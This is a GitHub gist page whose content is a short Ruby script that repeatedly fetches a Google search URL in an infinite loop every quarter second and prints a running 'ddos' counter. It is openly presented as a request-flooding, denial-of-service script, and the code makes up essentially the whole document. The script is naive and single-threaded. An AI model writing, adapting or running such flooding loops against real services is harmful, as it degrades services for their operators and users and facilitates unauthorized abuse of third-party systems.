Skip to content

Instantly share code, notes, and snippets.

@johanlunds
Created June 27, 2013 18:51
Show Gist options
  • Save johanlunds/5879255 to your computer and use it in GitHub Desktop.
Save johanlunds/5879255 to your computer and use it in GitHub Desktop.
require 'open-uri'
url = 'https://www.google.se/?q=hejsan#output=search&sclient=psy-ab&q=hejsan&oq=hejsan&gs_l=hp.12...0.0.0.3922.0.0.0.0.0.0.0.0..0.0...0.0.0..1c..17.psy-ab.8WBSJa-IWsA&pbx=1&bav=on.2,or.r_qf.&bvm=bv.48572450,d.Yms&fp=6ac8bc13f76b424b&biw=1424&bih=1284'
i = 0
while true
open(url)
i += 1
puts "ddos #{i}"
Kernel.sleep 0.25
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment